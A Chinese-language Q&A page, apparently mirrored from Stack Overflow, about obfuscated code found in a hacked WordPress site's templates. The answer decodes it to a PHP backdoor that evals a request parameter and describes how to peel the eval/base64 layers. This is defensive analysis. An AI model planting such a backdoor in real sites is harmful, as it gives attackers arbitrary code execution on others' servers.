我 friend 的一个 wordpress 网站被人黑了,他们把下面的代码放在所有模板文件的头部。
我尝试用 base64 解码器解码它。但是输出看起来很奇怪。你们能告诉我这是什么类型的编码吗?
最佳答案
是一系列的eval+base64加密。解码后的代码为:
if (isset($_REQUEST['r' . 'e' . 'y' . 'yo']))
eval(stripslashes($_REQUEST['r' . 'e' . 'y' . 'y' . 'o']));
我是这样得到的:
- 将整个代码复制到您的文本编辑器中
- 提供
\/\*.*?\*\/
作为搜索模式,并替换为''
(空字符串) - 现在您将获得一个或多个
eval()
语句。将其更改为echo
。 - 重复
基本上,此代码将允许攻击者在您的网站上注入(inject)和执行任意代码。
关于php - 有人可以解码这个脏代码吗?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/23082306/